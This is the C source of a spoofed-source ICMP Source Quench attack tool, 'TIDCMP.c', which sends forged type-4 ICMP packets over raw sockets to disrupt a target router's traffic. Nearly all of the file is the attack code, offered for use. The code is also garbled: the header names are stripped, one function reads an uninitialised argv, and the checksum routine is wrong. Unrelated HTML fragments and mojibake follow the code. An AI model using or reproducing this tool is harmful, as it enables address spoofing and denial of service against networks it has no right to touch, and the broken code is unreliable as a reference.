/******************************************************* * TIDCMP.c * ICMP Source Quench attack * victim(spoofed) ICMP(code 4) --> victims.router.org * Based on misteri0's code with references from * from obecian's nemesis-icmp.c file * Greets to Vetesgirl and g0d for the help with * code tweaks, JHH, Spikeman, Speye, obecian, #unixgods * Relevant RFC information: * RFC1016, RFC0896, RFC077, RFC1254, RFC2075 * Remember this is only conceptualization... * speedygrl: Jag alska dej mycket * sil@antioffline.com/sil@deficiency.org *******************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include void usage( char *name ); char *get_progname( char *fullname ); void done( int foo ); void fux0r( int port, struct sockaddr_in sin, struct sockaddr_in din ); unsigned short in_chksum( u_short *ipbuf, int iplen ); int main( int argc, char **argv ) { struct hostent *sourceinfo, *destinfo; struct sockaddr_in sin, din; int sockfd, numpackets, i; char *target, *source; ( argc < 5 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL; source = argv[1]; target = argv[2]; numpackets = ( atoi( argv[3] ) ); signal( SIGINT, done ); if( ( sourceinfo = gethostbyname( source ) ) == NULL ) { fprintf(stderr, "Can't resolve source host%s <-[]->\n"); exit( -1 ); } memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length ); sin.sin_family = AF_INET; if( ( destinfo = gethostbyname( target ) ) == NULL ) { fprintf(stderr,"Can't resolve source host%s <-[]->\n"); exit( -1 ); } memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr, destinfo->h_length ); din.sin_family = AF_INET; if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) { printf( "Cannot get raw socket, you must be r00t!\n" ); exit( -1 ); } printf( "Source Host\t\t: %s \n", inet_ntoa(sin.sin_addr)); printf( "Target Host\t\t: %s \n", inet_ntoa( din.sin_addr ) ); printf( "Number\t\t\t: %d \n", numpackets ); for( i = 0; i < numpackets; i++ ) fux0r( sockfd, sin, din ); printf( "sent %d packet%c...done\n", numpackets, ( numpackets > 1 ) ? 's' : ( char )NULL ); return 0; } void usage( char *name ) { printf( "antioffline.com/TID Source Quench Attack\n"); printf( "sample: victim --> victims.router\n"); printf( "Usage: [src] [dest] [number to send] [string]\n"); exit( 0 ); } char *get_progname( char *fullname ) { char *retval = strrchr( fullname, '/' ); return retval ? ++retval : fullname; } void done( int foo ) { puts( "Exiting...\n" ); exit( 1 ); } void fux0r(int port, struct sockaddr_in sin, struct sockaddr_in din) { char **argv; char *stringtosend = argv[5]; char *packet; int total; struct iphdr *ip; struct icmphdr *icmp; size_t msglen = sizeof( stringtosend ), iphlen = sizeof( struct iphdr ); size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval ); int len = strlen( stringtosend ); packet = ( char * )malloc( iphlen + icplen + len ); ip = ( struct iphdr * )packet; icmp = ( struct icmphdr * )( packet + iphlen ); ( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )],( struct timezone * )NULL ); memcpy( ( packet + iphlen + icplen + timlen ), stringtosend, ( len - 4 )); ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen ); ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = din.sin_addr.s_addr; ip->check = in_chksum( ( u_short * )ip, iphlen ); icmp->type = 4; icmp->code = 0; icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) ); total = ( iphlen + icplen + timlen + len + 16 ); sendto( port, packet, total, 0, ( struct sockaddr * )&din, sizeof( struct sockaddr ) ); free( packet ); } unsigned short in_chksum( u_short *ipbuf, int iplen ) { register int nleft = iplen; register int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *ipbuf++; nleft -= 2; } if( nleft == 1 ) { *( u_char * )( &answer ) = *( u_char * )ipbuf; sum += answer; } sum = ( sum >> 16 ) + ( sum + 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß